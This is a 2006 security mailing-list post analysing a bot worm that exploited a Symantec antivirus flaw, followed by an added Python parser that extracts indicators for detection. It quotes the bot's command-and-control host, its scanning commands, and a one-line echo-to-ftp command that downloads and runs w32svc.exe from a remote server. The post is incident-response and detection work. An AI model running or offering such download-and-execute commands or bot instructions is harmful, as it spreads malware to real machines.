[unisog] Worm exploiting Symantec client defect?????
eckman at umn.edu
Mon Nov 27 23:41:24 GMT 2006
We might have a slightly different variant, because I've seen some
differences in activity related to this. I'll send out a slightly edited
version of what I sent out here to internal staff in just a few...
Cam Beasley wrote:
> - a reptile bot it seems
> - uses VMware and debugger detection
> - IRC Based C&C with a modified version of UnrealIRCD
> - Ops go by god and G00D
> - the botnet controller was at 184.108.40.206:6667
> but just recently jumped to 220.127.116.11:6667
The C&C is www.flackware.info:6667/tcp. Those IP addresses were what
that RR resolved to at given points in time.
> - initial attack vectors target tcp/2967 & tcp/6236
2967/tcp I can confirm. 6236/tcp is involved, but a packet capture
showed an infected host running a cmd.exe shell on that port, so I think
that this isn't "attacking" folks via that port, per se.
> - compromised hosts participate in a NetBIOS & VNC scan of
> local networks
I haven't seen this activity. I suspect the ones that were seen doing
this were told to do so by the C&C, and that our infections took place
at a time where the C&C was giving different instructions.
> - common bot commands are:
> .asc -S -s
> .asc mass445 100 5 0 -b -r -e -h
> .asc rtvscan 100 5 0
> - malcode is transferred thusly:
> echo open X.X.X.X 2100 > i&echo user 1 1 >> i
> &echo get w32svc.exe >> i &echo quit >> i &ftp
> -As:i &w32svc.exe &exit
> - w32svc.exe is dumped to C:\Program Files\Symantec AntiVirus
w32svc.exe may have been dumped there (the cmd.exe shell bound to
6236/tcp that I saw had C:\Program Files\Symantec AntiVirus as the
working directory), but I've been seeing it installed to %WINDIR%. It is
then removed from the initial location.
> - Symantec wasn't identifying the malcode 'w32svc.exe' the
> last time I checked.
The Rapid Release defs released before this post do detect it and do a
wonderful job of removal. The defs are 11/27/2006 rev.50.
Thanks for pointing this out, Cam!
Brian Eckman, Security Analyst
University of Minnesota
Office of Information Technology
Security & Assurance
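As an added example (not code from the thread or from either poster), a small Python parser that pulls the indicators out of the single-line "echo ... > i ... ftp -s:i" downloader pattern quoted above (FTP server, port, credentials, fetched file, and whether the fetched file is executed on the same line), so the pattern can be matched against process-creation logs; the server address in the sample is a constructed placeholder.

```python
import re
from typing import Optional

# Constructed sample of the command line quoted in the thread; the server
# address is a documentation placeholder, not a real indicator.
SAMPLE_CMDLINE = (
    'echo open 203.0.113.5 2100 > i&echo user 1 1 >> i '
    '&echo get w32svc.exe >> i &echo quit >> i &ftp '
    '-As:i &w32svc.exe &exit'
)

# One pattern per chained "echo ... > script" fragment, plus the ftp call.
OPEN_RE = re.compile(r'echo\s+open\s+(\S+)\s+(\d+)\s*>\s*([^\s&]+)', re.I)
USER_RE = re.compile(r'echo\s+user\s+(\S+)\s+(\S+)\s*>>', re.I)
GET_RE = re.compile(r'echo\s+get\s+(\S+)\s*>>', re.I)
FTP_RE = re.compile(r'\bftp\b[^&]*-[A-Za-z]*s:([^\s&]+)', re.I)


def parse_ftp_script_download(cmdline: str) -> Optional[dict]:
    """Return the indicators embedded in an echo-built ftp script command
    line, or None when the line is not that pattern."""
    m_open = OPEN_RE.search(cmdline)
    m_ftp = FTP_RE.search(cmdline)
    if not (m_open and m_ftp):
        return None
    script = m_open.group(3)
    # The file written by echo must be the one ftp -s: reads back;
    # otherwise this is not the single-line downloader pattern.
    if m_ftp.group(1) != script:
        return None
    m_user = USER_RE.search(cmdline)
    files = GET_RE.findall(cmdline)
    return {
        'ftp_server': m_open.group(1),
        'ftp_port': int(m_open.group(2)),
        'script_file': script,
        'credentials': (m_user.group(1), m_user.group(2)) if m_user else None,
        'fetched_files': files,
        # Fetched files that are also invoked later on the same line.
        'executed': [f for f in files
                     if re.search(r'&\s*' + re.escape(f) + r'\b', cmdline)],
    }


def is_suspicious(cmdline: str) -> bool:
    """True when a line builds an ftp script, fetches a file and runs it."""
    hit = parse_ftp_script_download(cmdline)
    return bool(hit and hit['executed'])
```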